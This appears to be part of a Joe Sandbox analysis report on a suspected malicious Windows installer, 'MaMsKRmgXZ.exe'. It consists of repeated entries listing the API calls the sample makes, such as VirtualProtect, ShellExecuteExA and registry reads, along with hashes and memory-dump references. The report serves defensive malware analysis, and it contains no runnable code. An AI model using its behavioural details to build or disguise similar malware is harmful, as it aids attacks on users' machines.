                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileRead
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                      • Opcode ID: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
                                                                                                                                      • Instruction ID: 7d11c2845e787d99b8eae26fbbcce04266139d1862b3a193897eab19ac9c5e73
                                                                                                                                      • Opcode Fuzzy Hash: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
                                                                                                                                      • Instruction Fuzzy Hash: 72E0E632558759ABDF106E559C00AEB775CEB45754F004832FE15E3150D231E8519BE9
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • VirtualProtect.KERNELBASE(6EC0404C,00000004,00000040,6EC0403C), ref: 6EC0293F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9908323213.000000006EC01000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EC00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9908269121.000000006EC00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9908365679.000000006EC03000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9908406672.000000006EC05000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6ec00000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                      • Opcode ID: 0986e17c87bc44b4f25ca2eb3bfc7259fe60b90aff143c5d58f633fe3516bc9d
                                                                                                                                      • Instruction ID: a553d1ace0577ecb1e7a78a0253b00256a4d411b7628d93c92d1ed9b19ace293
                                                                                                                                      • Opcode Fuzzy Hash: 0986e17c87bc44b4f25ca2eb3bfc7259fe60b90aff143c5d58f633fe3516bc9d
                                                                                                                                      • Instruction Fuzzy Hash: 3FF092B1509A80DEDB60DFA886847073FF5B3AA35DB03852EE178F7241E3364A468B11
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004023DA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: PrivateProfileString
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1096422788-0
                                                                                                                                      • Opcode ID: a930ba4684606d166f004347e567f9e530680cf266d7567c4f89b64240fb8247
                                                                                                                                      • Instruction ID: 87433fbf28b19ed2e9e97c64dce3a42f5842ec6a66e9b0e36d30645c49e8dc10
                                                                                                                                      • Opcode Fuzzy Hash: a930ba4684606d166f004347e567f9e530680cf266d7567c4f89b64240fb8247
                                                                                                                                      • Instruction Fuzzy Hash: 92E01230904309BAEB02AFB08D09EBE3E79EF05710F10042AB9606A0D2E6B89542D75E
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405EEE,?,?,?,?,00000002,Call), ref: 00405E84
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Open
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                      • Opcode ID: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
                                                                                                                                      • Instruction ID: 31d842323d9a2f535784a2c12e989c9eb1b9f9f44251d53ba3eec0f14c414acf
                                                                                                                                      • Opcode Fuzzy Hash: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
                                                                                                                                      • Instruction Fuzzy Hash: 75D0EC3204420DBADF115F90ED05FAB371DEB14355F004522FE05A4090D2769520AA55
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AttributesFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                      • Opcode ID: 479e8351d0654c961f05b900a28070053bee6eceb2280e12bb67dca2ecaab8d8
                                                                                                                                      • Instruction ID: d5005c83e4bc13d794db0995845c4037c46dc405a88debeb1123cd551caf7fcc
                                                                                                                                      • Opcode Fuzzy Hash: 479e8351d0654c961f05b900a28070053bee6eceb2280e12bb67dca2ecaab8d8
                                                                                                                                      • Instruction Fuzzy Hash: F5D05BB2B08200EBCB11DFE8EF08A5E77B5EB54325F204577E101F21D1D2B88641975A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • SendMessageA.USER32(000103F8,00000000,00000000,00000000), ref: 004040C6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                      • Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                                                                                                                      • Instruction ID: d19a9dbcf4508c1e9b2ca47d0762ffb16ec5c10abf7e35186d5f4f0c6b5da105
                                                                                                                                      • Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                                                                                                                      • Instruction Fuzzy Hash: F9C04C71754201BAEA319B50DD49F0777586750B00F5584257314F60D1C6B4E451D62D
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F89,?), ref: 004031FB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FilePointer
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                      • Opcode ID: 5ff25966693df5c3ccda7a99ea4025cbe7cf73b83d997e6322396513365c8623
                                                                                                                                      • Instruction ID: 8831d3de15784b4579c3d7b303db9b45d0c358e109056f74ce618eb3ecc3c243
                                                                                                                                      • Opcode Fuzzy Hash: 5ff25966693df5c3ccda7a99ea4025cbe7cf73b83d997e6322396513365c8623
                                                                                                                                      • Instruction Fuzzy Hash: 74B01231544200BFDB214F00DE05F057B21A790700F10C030B344780F082712460EB5D
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • SendMessageA.USER32(00000028,?,00000001,00403ECD), ref: 004040AB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                      • Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                                                                                                                      • Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
                                                                                                                                      • Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                                                                                                                      • Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • ShellExecuteExA.SHELL32(?,004044AF,?), ref: 004056CB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExecuteShell
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 587946157-0
                                                                                                                                      • Opcode ID: 2982c174e10af5d4c40be735a028cd5bbc0670b812c5b1d1bedef84de471004d
                                                                                                                                      • Instruction ID: 740202cceb9cd72bfbe3504c5fe3e084c22a481b72cb9b9ac8673d70f1f22f9b
                                                                                                                                      • Opcode Fuzzy Hash: 2982c174e10af5d4c40be735a028cd5bbc0670b812c5b1d1bedef84de471004d
                                                                                                                                      • Instruction Fuzzy Hash: 45C092B2404200DFE301CF90CB58F077BE8AB55306F028054E1849A2A0C378A800CB7A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00403E66), ref: 00404094
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2492992576-0
                                                                                                                                      • Opcode ID: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
                                                                                                                                      • Instruction ID: 627edf876ec6fe827e8ded8b6e0f84c3e1bff33d3b07c91bc4a796ca35ff40dd
                                                                                                                                      • Opcode Fuzzy Hash: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
                                                                                                                                      • Instruction Fuzzy Hash: CAA00176808101ABCB029B50FF09D9ABF62ABA5705B028435E65694174C7325865FF1A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • CharNextA.USER32(?,00403342,"C:\Users\user\Desktop\MaMsKRmgXZ.exe",00000020,"C:\Users\user\Desktop\MaMsKRmgXZ.exe",00000000,?,00000006,00000008,0000000A), ref: 004059AA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CharNext
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3213498283-0
                                                                                                                                      • Opcode ID: 8cf835664248effb320104481b144b4bb8d71e10ab3bb1acd277cfd9e7e0a14f
                                                                                                                                      • Instruction ID: b74f3e51ff379b0403c46f5e122a68af47440e22da2293db9c2025f450519604
                                                                                                                                      • Opcode Fuzzy Hash: 8cf835664248effb320104481b144b4bb8d71e10ab3bb1acd277cfd9e7e0a14f
                                                                                                                                      • Instruction Fuzzy Hash: 21C0807080D540E7F6114730952456B7FE09A51350F54C857F4C063251C138B8408F37
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404549
                                                                                                                                      • SetWindowTextA.USER32(00000000,?), ref: 00404573
                                                                                                                                      • SHBrowseForFolderA.SHELL32(?,0041F0E0,?), ref: 00404624
                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 0040462F
                                                                                                                                      • lstrcmpiA.KERNEL32(Call,Nagari Setup: Installing), ref: 00404661
                                                                                                                                      • lstrcatA.KERNEL32(?,Call), ref: 0040466D
                                                                                                                                      • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040467F
                                                                                                                                        • Part of subcall function 004056DA: GetDlgItemTextA.USER32(?,?,00000400,004046B6), ref: 004056ED
                                                                                                                                        • Part of subcall function 00406244: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\MaMsKRmgXZ.exe",751D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 0040629C
                                                                                                                                        • Part of subcall function 00406244: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062A9
                                                                                                                                        • Part of subcall function 00406244: CharNextA.USER32(?,"C:\Users\user\Desktop\MaMsKRmgXZ.exe",751D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 004062AE
                                                                                                                                        • Part of subcall function 00406244: CharPrevA.USER32(?,?,751D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 004062BE
                                                                                                                                      • GetDiskFreeSpaceA.KERNEL32(0041ECD8,?,?,0000040F,?,0041ECD8,0041ECD8,?,00000001,0041ECD8,?,?,000003FB,?), ref: 0040473D
                                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404758
                                                                                                                                        • Part of subcall function 004048B1: lstrlenA.KERNEL32(Nagari Setup: Installing,Nagari Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047CC,000000DF,00000000,00000400,?), ref: 0040494F
                                                                                                                                        • Part of subcall function 004048B1: wsprintfA.USER32 ref: 00404957
                                                                                                                                        • Part of subcall function 004048B1: SetDlgItemTextA.USER32(?,Nagari Setup: Installing), ref: 0040496A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                      • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens$Call$Nagari Setup: Installing
                                                                                                                                      • API String ID: 2624150263-2741233494
                                                                                                                                      • Opcode ID: 0f165c49e2d917f5e6a894268aac4f35a0a20fd2ca942178d6907e18a15d5205
                                                                                                                                      • Instruction ID: a574bab901635a86c0a25b0ea1efcbf713871747dcedb108b051a9d89a4042ab
                                                                                                                                      • Opcode Fuzzy Hash: 0f165c49e2d917f5e6a894268aac4f35a0a20fd2ca942178d6907e18a15d5205
                                                                                                                                      • Instruction Fuzzy Hash: E9A16FB1900219ABDB11EFA5CD41AAFB7B8EF85315F10843BF601B62D1D77C8A418F69
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • CoCreateInstance.OLE32(00407410,?,00000001,00407400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021BA
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402269
                                                                                                                                      Strings
                                                                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae, xrefs: 004021FA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
